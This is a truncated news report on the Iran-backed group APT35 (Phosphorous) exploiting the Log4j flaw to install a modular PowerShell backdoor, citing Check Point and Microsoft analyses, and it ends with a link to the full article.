Hackers are using the Log4j flaw to deliver this new 'modular' backdoor

Iran-backed hacking group Phosphorous or APT35 is using the Log4j vulnerability to distribute a new modular PowerShell toolkit, according to security firm Check Point. 

APT35 is one of several state-backed hacking groups known to have been developing tools to exploit public-facing Java applications that use vulnerable versions of the Log4j error-logging component.

more Log4j

Microsoft, which tracks the group as Phosphorous and has called it out for increasingly using ransomware in attacks, found it had operationalized a Log4j exploit for future campaigns less than a week after Log4Shell’s December 9 disclosure. 

SEE: Log4j zero-day flaw: What you need to know and how to protect yourself

According to a further analysis by Check Point, APT35’s Log4j work was sloppy and “obviously rushed”, using a basic publicly available JNDI exploit kit (now removed from GitHub) for attacks that were easy to detect and attribute. 

After exploiting Log4j on public-facing systems, the group uses what Check Point describes it as ‘a PowerShell-based modular backdoor’ for persistence, communication with a command and control (C&C) server, and command execution for additional modules. 

The main module of the attacker’s PowerShell framework validates network connections, enumerates characteristics about a compromised system, retrieves the C&C domain from

Read More: https://www.zdnet.com/article/hackers-are-using-the-log4j-flaw-to-deliver-this-new-modular-backdoor/#ftag=RSSbaffb68